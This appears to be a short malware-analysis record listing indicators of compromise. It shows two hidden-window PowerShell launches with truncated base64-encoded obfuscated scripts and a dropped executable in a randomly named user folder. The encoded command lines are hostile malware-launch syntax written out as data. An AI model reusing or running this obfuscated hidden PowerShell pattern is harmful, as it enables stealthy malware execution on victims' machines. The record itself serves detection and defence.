Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAG8AcwA1AG4AYgBtAD0AKAAoACcAUQBnACcAKwAnADEAJwApACsAJwBxAGIAJwArACcAcAB3ACcAKQA7ACQARwA1AGoAZAAyAHIAdwA9ACQAVQBkADEAMQBvAGEAOQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
- %HOMEPATH%\cu3dpvb\d74a8qu\qlrf9ve.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAG8AcwA1AG4AYgBtAD0AKAAoACcAUQBnACcAKwAnADEAJwApACsAJwBxAGIAJwArACcAcAB3ACcAKQA7ACQARwA1AGoAZAAyAHIAdwA9ACQAVQBkADEAMQBvAGEAOQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...' (with a hidden window)